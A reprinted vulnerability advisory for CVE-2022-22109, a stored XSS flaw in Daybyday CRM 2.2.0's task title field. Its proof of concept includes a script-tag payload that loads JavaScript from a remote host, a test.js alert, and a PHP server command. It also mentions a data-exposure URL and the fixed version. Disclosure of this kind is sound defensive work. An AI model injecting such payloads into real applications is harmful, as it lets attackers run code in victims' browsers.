Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-22109: WhiteSource Vulnerability Database

In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks� page to view all the tasks.

CVE
#xss#vulnerability#mac#js#java

Overview

In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.

Details

Daybyday CRM is affected by a stored XSS vulnerability that allows low privileged application users (having permission to create tasks) to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.

PoC Details

For demonstration purposes we\’ll use 2 users:
[email protected] (low privileged user)
[email protected] (administrator)
Login to the application as [email protected], which has a role Employee and has permissions to create tasks.
Go to “New Task” from the left pane and create a new task. Inject the below payload in the Title field and click on Create Task button. The payload includes the attacker\’s remote machine from which they load javascript malicious code.
On the attacker’s machine, create a file called “test.js” with contents as given below.
Run a PHP server to host the “test.js” file.
Login as [email protected] and go to All Tasks from the left pane, and will notice that an alert pops up with content hosted on the PHP server.
Login with [email protected]. Add “/users/calendar-users” to the url, and the absences for all the users will be available in the returned JSON data.

PoC Code

// Payload
"></a><script type="text/javascript" src="http://192.168.18.40:9999/test.js"></script>
// “test.js” contents:
alert(“This proves my POC works :)”);
// Command to run the PHP server
php -S 192.168.18.40:9999

Affected Environments

bottelet/flarepoint - 2.2.0

Prevention

Update to 2.2.1 in “bottelet/flarepoint” package, 2.2.1 in “Bottelet/DaybydayCRM” repo.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907